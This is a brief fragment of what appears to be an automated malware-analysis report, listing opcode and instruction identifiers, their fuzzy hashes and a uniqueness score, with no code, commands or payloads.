                                                          • Opcode ID: 61193fbb3c11a6377def257641601a12032aaed3a0883b3445c2989be8d24a87
                                                          • Instruction ID: bb27cc44921f75a905eb0cb73b6a71ee64e31b77565243a0265a977276a5cb3b
                                                          • Opcode Fuzzy Hash: 61193fbb3c11a6377def257641601a12032aaed3a0883b3445c2989be8d24a87
                                                          • Instruction Fuzzy Hash: 8811753160CB098FEB54EF58B849565B7E5EB98311F00453EECCAC7285DE70D9458786
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%